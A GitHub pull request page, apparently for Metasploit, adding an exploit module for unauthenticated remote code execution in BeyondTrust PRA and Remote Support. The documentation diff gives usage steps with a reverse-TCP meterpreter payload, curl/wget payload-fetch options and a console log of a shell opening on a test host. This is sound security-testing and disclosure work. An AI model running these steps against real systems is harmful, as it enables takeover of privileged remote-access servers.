Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

Merged
merged 19 commits into from
Feb 17, 2025
+445 −0
Merged

Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

Show file tree
Hide file tree
Changes from 10 commits
Commits
Show all changes
19 commits
Select commit Hold shift + click to select a range
528409b
add in the exploit for cve-2024-12356
sfewer-r7 Jan 24, 2025
d887ab5
add in module option to leverage CVE-2024-12356. This option is disab…
sfewer-r7 Jan 31, 2025
c6d0306
add in the documentation
sfewer-r7 Jan 31, 2025
c9be9b6
fix typos in docs
sfewer-r7 Feb 12, 2025
3727644
improve the description for this option
sfewer-r7 Feb 12, 2025
18f0bbe
add in the new CVE ID for the PosgreSQL vuln
sfewer-r7 Feb 12, 2025
d93a99c
rename the module
sfewer-r7 Feb 13, 2025
90daccd
add in link to AKB analysis
sfewer-r7 Feb 13, 2025
9fc8b3b
fix a typo
sfewer-r7 Feb 13, 2025
2d858ac
Improve the auto discovery of the target site info. We can query an u…
sfewer-r7 Feb 14, 2025
eb1feba
Fix typo in comment (Thanks jvoisin)
sfewer-r7 Feb 17, 2025
6ed6054
Print the actual status code in the error message (Thanks msutovsky-r7)
sfewer-r7 Feb 17, 2025
1308956
Remove a duplicate work in this comment (Thanks jvoisin)
sfewer-r7 Feb 17, 2025
ed54130
Explicitly close the WebSocket connection
sfewer-r7 Feb 17, 2025
c950264
Add some comments in the check routine to note theres is no known low…
sfewer-r7 Feb 17, 2025
fbef2ba
remove the uneeded parenthesis and make rubocop happy.
sfewer-r7 Feb 17, 2025
6f1287d
add in some logic to detect potentially failed exploitation due to th…
sfewer-r7 Feb 17, 2025
bb9013a
check the frame for nil
sfewer-r7 Feb 17, 2025
65e2a20
We can remove this line as it is redundant. The regex that follows wi…
sfewer-r7 Feb 17, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
101 changes: 101 additions & 0 deletions documentation/modules/exploit/linux/http/beyondtrust_pra_rs_unauth_rce.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
## Vulnerable Application
This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
product site. This exploit targets PRA and RS versions `24.3.1` and below.

## Testing
This exploit was tested against a vulnerable BeyondTrust Remote Support target running version `24.1.2`. To install
a virtual appliance, follow [this documentation](https://docs.beyondtrust.com/rs/docs/va-install). You will first need
to acquire the relevant software packages.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/beyondtrust_pra_rs_unauth_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
6. `set LPORT 4444`
7. `check`
8. `exploit`

## Options

### TargetCompanyName
If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
By default, this is auto discovered.

### TargetServerFQDN
If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
By default, this is auto discovered.

### LeverageCVE_2024_12356
By default, this exploit does not leverage the argument injection vulnerability CVE-2024-12356, and instead exploits the
SQLi vulnerability CVE-2025-1094 directly. Enabling this option will cause this exploit to leverage CVE-2024-12356 during
the exploitation of the SQLi vulnerability CVE-2025-1094. In either case the SQLi vulnerability CVE-2025-1094 is leveraged
to achieve RCE.

## Scenarios

### Default

```
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > show options
Module options (exploit/linux/http/beyondtrust_pra_rs_unauth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.105 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILENAME usKuEPuSzgnx no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
LHOST eth0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[*] Sending stage (3045380 bytes) to 192.168.86.105
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000
meterpreter > getuid
Server username: mytestcompany
meterpreter > sysinfo
Computer : 192.168.86.105
OS : Gentoo 2.14 (Linux 6.1.76-bt)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
Loading
Loading